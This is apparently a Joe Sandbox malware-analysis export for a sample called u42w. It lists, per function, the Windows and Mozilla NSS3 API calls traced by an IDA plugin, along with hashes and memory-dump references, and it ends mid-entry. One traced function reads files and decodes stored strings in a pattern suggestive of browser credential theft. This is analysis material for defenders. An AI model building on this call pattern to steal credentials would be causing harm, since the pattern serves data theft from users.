                                                                                                                                                                                                                                • Part of subcall function 6C991D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C991D7E
                                                                                                                                                                                                                                • Part of subcall function 6C991D50: EnterCriticalSection.KERNEL32(?), ref: 6C991D8E
                                                                                                                                                                                                                                • Part of subcall function 6C991D50: PR_Unlock.NSS3(?), ref: 6C991DD3
                                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C99EE51
                                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C99EE65
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C99EEA2
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C99EEBB
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C99EED0
                                                                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C99EF48
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C99EF68
                                                                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6C99EF7D
                                                                                                                                                                                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6C99EFA4
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C99EFDA
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C99F055
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6C99F060
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2524771861-0
                                                                                                                                                                                                                              • Opcode ID: dfcf6da8a4538c27b2adeb199e92cd7c2c04a0b11932161dd02beba80566058e
                                                                                                                                                                                                                              • Instruction ID: fedea39b226a896bf16f6ac8b5f63f092725b8982d94c2c497f905b07f098e56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfcf6da8a4538c27b2adeb199e92cd7c2c04a0b11932161dd02beba80566058e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C88171B1E00209ABDF00DFA5DC45BEE7BB9BF19318F184024E919A3711E731E965CBA1
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PK11_SignatureLen.NSS3(?), ref: 6C964D80
                                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6C964D95
                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C964DF2
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C964E2C
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C964E43
                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C964E58
                                                                                                                                                                                                                              • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C964E85
                                                                                                                                                                                                                              • DER_Encode_Util.NSS3(?,?,6CAB05A4,00000000), ref: 6C964EA7
                                                                                                                                                                                                                              • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C964F17
                                                                                                                                                                                                                              • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C964F45
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C964F62
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C964F7A
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C964F89
                                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C964FC8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2843999940-0
                                                                                                                                                                                                                              • Opcode ID: 415cd6fe3def5b906f1b11ef54dd2a089a37d97651f99e94f89cb4620f7f9313
                                                                                                                                                                                                                              • Instruction ID: a73d04e04b5dc849307e8ba9501756e848afbdc70a07fabf012f861b0a8e1a66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 415cd6fe3def5b906f1b11ef54dd2a089a37d97651f99e94f89cb4620f7f9313
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E81C271908301AFF701CFA6D850B5BB7E8AB94748F14892DF958DBA80E731E915CF92
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C9604B7
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C9587ED,00000800,6C94EF74,00000000), ref: 6C9B1000
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PR_NewLock.NSS3(?,00000800,6C94EF74,00000000), ref: 6C9B1016
                                                                                                                                                                                                                                • Part of subcall function 6C9B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C9587ED,00000008,?,00000800,6C94EF74,00000000), ref: 6C9B102B
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C960539
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B1228
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C9B1238
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B124B
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: PR_CallOnce.NSS3(6CAB2AA4,6C9B12D0,00000000,00000000,00000000,?,6C9588A4,00000000,00000000), ref: 6C9B125D
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C9B126F
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C9B1280
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C9B128E
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C9B129A
                                                                                                                                                                                                                                • Part of subcall function 6C9B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C9B12A1
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C96054A
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C96056D
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9605CA
                                                                                                                                                                                                                              • DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C9605EA
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C9605FD
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C960621
                                                                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6C96063E
                                                                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6C960668
                                                                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?), ref: 6C960697
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9606AC
                                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C9606CC
                                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C9606DA
                                                                                                                                                                                                                                • Part of subcall function 6C95E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C9604DC,?,?), ref: 6C95E6C9
                                                                                                                                                                                                                                • Part of subcall function 6C95E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C9604DC,?,?), ref: 6C95E6D9
                                                                                                                                                                                                                                • Part of subcall function 6C95E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C9604DC,?,?), ref: 6C95E6F4
                                                                                                                                                                                                                                • Part of subcall function 6C95E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C9604DC,?), ref: 6C95E703
                                                                                                                                                                                                                                • Part of subcall function 6C95E6B0: CERT_FindCertIssuer.NSS3(?,?,6C9604DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C95E71E
                                                                                                                                                                                                                                • Part of subcall function 6C95F660: PR_EnterMonitor.NSS3(6C96050F,?,00000001,?,?,?), ref: 6C95F6A8
                                                                                                                                                                                                                                • Part of subcall function 6C95F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C95F6C1
                                                                                                                                                                                                                                • Part of subcall function 6C95F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C95F7C8
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2470852775-0
                                                                                                                                                                                                                              • Opcode ID: b1714d029c350b7a8df7d9c3b6c73e93413f763c7d20ef800a3ff66992aabd87
                                                                                                                                                                                                                              • Instruction ID: ab12487f0ae228a35a285f4e19ab02ab86716aa21ad4b745a89de8fd26f0c16b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b1714d029c350b7a8df7d9c3b6c73e93413f763c7d20ef800a3ff66992aabd87
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F061F671A043829FFB10CE26CC80B5B77E8AF94358F104629F95997BD1E730E918CB96
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • PR_LogPrint.NSS3(C_GetSlotList), ref: 6C9825DD
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C98262A
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA60BAB
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60BBA
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60D7E
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6C98260F
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60B88
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CA60C5D
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CA60C8D
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60C9C
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(?), ref: 6CA60CD1
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CA60CEC
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60CFB
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA60D16
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CA60D26
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CA60D35
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CA60D65
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CA60D70
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA60D90
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: free.MOZGLUE(00000000), ref: 6CA60D99
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6C9825F6
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_Now.NSS3 ref: 6CA60A22
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CA60A35
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CA60A66
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_GetCurrentThread.NSS3 ref: 6CA60A70
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CA60A9D
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CA60AC8
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_vsmprintf.NSS3(?,?), ref: 6CA60AE8
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: EnterCriticalSection.KERNEL32(?), ref: 6CA60B19
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CA60B48
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CA60C76
                                                                                                                                                                                                                                • Part of subcall function 6CA609D0: PR_LogFlush.NSS3 ref: 6CA60C7E
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C982699
                                                                                                                                                                                                                              • PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6C9826C5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
                                                                                                                                                                                                                              • String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList
                                                                                                                                                                                                                              • API String ID: 2625801553-2918917633
                                                                                                                                                                                                                              • Opcode ID: aec554f7fc81280450746c73557554882f4daa4329400b0c3641d169654a490d
                                                                                                                                                                                                                              • Instruction ID: 1d142deaec2ef87f3eb14cfb3d16f802d98599fb012bfcef4ec2c459a914a1c6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aec554f7fc81280450746c73557554882f4daa4329400b0c3641d169654a490d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C2310871202646AFDB04CF54ED8CA457BB5FB6230DF04886BE80597A22DB30DC99CB65
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C99781D,00000000,6C98BE2C,?,6C996B1D,?,?,?,?,00000000,00000000,6C99781D), ref: 6C996C40
                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C99781D,?,6C98BE2C,?), ref: 6C996C58
                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C99781D), ref: 6C996C6F
                                                                                                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C996C84
                                                                                                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C996C96
                                                                                                                                                                                                                                • Part of subcall function 6C941240: TlsGetValue.KERNEL32(00000040,?,6C94116C,NSPR_LOG_MODULES), ref: 6C941267
                                                                                                                                                                                                                                • Part of subcall function 6C941240: EnterCriticalSection.KERNEL32(?,?,?,6C94116C,NSPR_LOG_MODULES), ref: 6C94127C
                                                                                                                                                                                                                                • Part of subcall function 6C941240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C94116C,NSPR_LOG_MODULES), ref: 6C941291
                                                                                                                                                                                                                                • Part of subcall function 6C941240: PR_Unlock.NSS3(?,?,?,?,6C94116C,NSPR_LOG_MODULES), ref: 6C9412A0
                                                                                                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C996CAA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2117916713.000000006C8D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 6C8D0000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2117869738.000000006C8D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118379391.000000006CAAE000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118415467.000000006CAAF000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118444554.000000006CAB0000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2118486121.000000006CAB5000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6c8d0000_u42w.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                              • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                              • Opcode ID: d5f81ebdcb74926af5668f1d6168cf34669acf5e380420da4b20a9c23b8019c9
                                                                                                                                                                                                                              • Instruction ID: 41e3c52ad140fb30acdcfcaec5aa3e71895bfad722a696111099c4767c15c300
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5f81ebdcb74926af5668f1d6168cf34669acf5e380420da4b20a9c23b8019c9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5101A2A17023022BFB5027B96D4AF66259CAF8115CF1C8431FF04E0982FB92E515C0F5
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F4E
                                                                                                                                                                                                                              • memset.MSVCRT ref: 00411F65
                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 00411F9C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F65680), ref: 00411FBB
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00411FCF
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,02F65398), ref: 00411FE3
                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                • Part of subcall function 004096C0: StrStrA.SHLWAPI(00000000,02F65758), ref: 0040971B
                                                                                                                                                                                                                                • Part of subcall function 004096C0: memcmp.MSVCRT ref: 00409774
                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                • Part of subcall function 00415AC0: GlobalAlloc.KERNEL32(00000000,00412087,00412087), ref: 00415AD3
                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,02F66678), ref: 0041209D
                                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00412199
                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                                • Part of subcall function 004094A0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                                • Part of subcall function 004094A0: LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0041212A
                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D4AB,?,?,?,?,000003E8), ref: 00412147
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00412159
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 0041216C
                                                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,0041D840), ref: 0041217B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2087928703.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u42w.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcat$Local$AllocFile$Freememset$BinaryCryptGlobalStringmemcmp$AttributesChangeCloseCreateFindFolderNotificationPathReadSizelstrcpy
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3662689742-0
                                                                                                                                                                                                                              • Opcode ID: 35ff916f43800d44740750d6f16ca7d506e8e9b4bced9b61d5cf2e6d64bf0eaf
                                                                                                                                                                                                                              • Instruction ID: d5c3215e2bd1f08faed5fb03d7604f0585b4cbbeb5c4b7daf79ee1030fe867fa
